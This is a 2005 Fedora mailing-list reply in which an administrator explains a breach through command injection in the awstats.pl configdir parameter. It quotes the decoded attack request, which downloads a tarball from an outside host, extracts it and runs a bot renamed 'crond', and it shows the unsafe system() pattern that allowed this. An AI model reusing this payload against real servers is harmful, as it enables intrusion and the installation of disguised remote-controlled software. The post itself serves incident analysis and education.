Security Breach
Aleksandar Milivojevic
amilivojevic at pbl.ca
Fri Mar 4 18:17:49 UTC 2005
David Cary Hart wrote:
> On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
>>Replace the url-encoded characters and you get:
>>
>>/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget
>>zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv
>>mech crond;export PATH=;crond;echo e_exp;%00
>>
>>So the attacker has tricked the script into executing a set of shell
>>commands, which include changing directory to /tmp, downloading a
>>tarball from a Romanian site, extracting that tarball and then executing
>>a program from the downloaded and extracted tarball, after renaming it
>>to "crond" in an effort to disguise it.
>
> I got that part. What I am trying to understand (please bear with me) is
> how the attacker might have modified the script command line.
It is enough if the script does something as stupid as:
system("cat $configdir/somefile")
(Assuming value of configdir is stored in $configdir variable).
What gets executed is:
cat |echo ; echo b_exp; [...]; echo e_exp;%00/somefile
The last part will produce an error, most likely, but who cares, the
important part was already executed...
It is classic example of command injection. Most of exploits of that
type are for SQL queries. This one is for shell.
--
Aleksandar Milivojevic <amilivojevic at pbl.ca> Pollard Banknote Limited
Systems Administrator 1499 Buffalo Place
Tel: (204) 474-2323 ext 276 Winnipeg, MB R3T 1L7
More information about the fedora-list
mailing list